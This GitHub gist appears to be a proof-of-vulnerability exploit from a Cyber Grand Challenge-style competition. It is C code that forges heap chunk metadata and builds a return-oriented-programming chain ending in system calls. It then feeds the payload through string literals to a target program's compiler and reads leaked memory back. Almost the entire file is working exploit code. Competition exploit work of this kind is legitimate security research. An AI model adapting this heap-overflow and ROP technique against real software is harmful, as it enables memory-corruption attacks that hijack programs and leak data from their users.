Skip to content

Instantly share code, notes, and snippets.

@potetisensei

potetisensei/6.c

Created August 21, 2016 08:48
Show Gist options
  • Save potetisensei/ee2e8870edd6e8d7dcd8a4360d8fec3c to your computer and use it in GitHub Desktop.
Save potetisensei/ee2e8870edd6e8d7dcd8a4360d8fec3c to your computer and use it in GitHub Desktop.
Download ZIP
LEGIT_00006 pov
Raw
6.c
#include <pov.h>
#include <stdio.h>
unsigned int getrand() {
unsigned int ret = 0x41414141;
//int i;
//for (i=0; i<4; i++) {
// ret *= 0x100;
// unsigned char c;
// random(&c, 1, NULL);
// ret += 0x80 + c % 0x80;
//}
return ret;
}
int exploit1() {
type2_init();
unsigned int payload_addr = 0xb7fff073;
buf_t * dummy_table = buf_new();
buf_p32(dummy_table, payload_addr+4);
buf_p32(dummy_table, 0x080545b7); // retn 0x0BEB
int A = -48;
int B = -31;
TYPE2_ADDR += 0x28;
buf_t *payload = buf_new();
buf_p32(payload, getrand() | 1);
buf_p32(payload, 0xfffffff1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, 0xffffffe1);
buf_p32(payload, 0x080c0481);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, A);
buf_p32(payload, B);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, 0x80c0b11);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, 0x80c0b31);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, getrand() | 1);
buf_p32(payload, 0xffffffff);
buf_p32(payload, payload_addr);
buf_p32(payload, 0xb7fdb0a0-8);
buf_t *payload2 = buf_new();
buf_p32(payload2, 0x0806f885); // pop esi ; ret
buf_p32(payload2, 0x080c0b31);
buf_p32(payload2, 0x0806859e); // pop eax ; ret
buf_p32(payload2, TYPE2_ADDR/2);
buf_p32(payload2, 0x0806f885); // pop ecx ; ret
buf_p32(payload2, TYPE2_ADDR - TYPE2_ADDR/2);
buf_p32(payload2, 0x08049907); // add ecx, eax; destroy eax; add esp, 4; pop ebp ; ret
buf_append_rand_pad(payload2, 'A', 'A', 4);
buf_append_rand_pad(payload2, 'A', 'A', 4);
buf_p32(payload2, 0x0806859e); // pop eax ; ret
buf_p32(payload2, 0xf7f3f111); // 0xf7f3f111 + 0x080C0EF0 = 1
buf_p32(payload2, 0x0809c034); // add eax, 0x080C0EF0 ; pop ebp ; ret ;
buf_append_rand_pad(payload2, 'A', 'A', 4);
buf_p32(payload2, 0x08098f0e); // xchg eax, ebx ; ret
buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
int i;
for (i=0; i<TYPE2_LENGTH; i++) {
buf_p32(payload2, 0x08058c09); // inc eax ; ret
}
buf_p32(payload2, 0x08087041); // xchg eax, edx ; ret
buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
buf_p32(payload2, 0x08058c09); // inc eax ; ret
buf_p32(payload2, 0x08058c09); // inc eax ; ret
buf_p32(payload2, 0x0809c0e3); // int 0x80 ; pop ecx ; pop ebx ; ret
buf_append_rand_pad(payload2, 'A', 'A', 4);
buf_append_rand_pad(payload2, 'A', 'A', 4);
buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
buf_p32(payload2, 0x08098f0e); // xchg eax, ebx ; ret
buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
buf_p32(payload2, 0x08058c09); // inc eax ; ret
buf_p32(payload2, 0x0809c0e3); // int 0x80 ; pop ecx ; pop ebx ; ret
sendline("void func1 () {");
buf_t *tmp = buf_new();
buf_append(tmp, " ");
buf_append_rand_pad(tmp, 'A', 'A', 956);
buf_append(tmp, ";\n");
sendb(tmp);
buf_delete(tmp);
tmp = buf_new();
buf_append(tmp, " \"");
buf_append_rand_pad(tmp, 'A', 'A', 256);
buf_append(tmp, "\";\n");
sendb(tmp);
buf_delete(tmp);
tmp = buf_new();
buf_append(tmp, " \"");
buf_append_rand_pad(tmp, 'A', 'A', 0x28);
buf_appendb_del(tmp, payload);
buf_append_rand_pad(tmp, 'A', 'A', 0x68);
buf_append(tmp, "\";\n");
sendb(tmp);
buf_delete(tmp);
tmp = buf_new();
buf_append(tmp, " \"");
buf_appendb_del(tmp, dummy_table);
buf_append_rand_pad(tmp, 'A', 'A', 0x1dc);
buf_appendb(tmp, payload2);
buf_append_rand_pad(tmp, 'A', 'A', 0x31c-payload2->len);
buf_append(tmp, "\";\n");
sendb(tmp);
buf_delete(tmp);
sendline("}\n");
sendline(">>COMPILE");
skipuntil("line 2.\n");
type2_submit((const unsigned char*)recvn(TYPE2_LENGTH), TYPE2_LENGTH);
return 0;
}
int main()
{
exploit1();
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment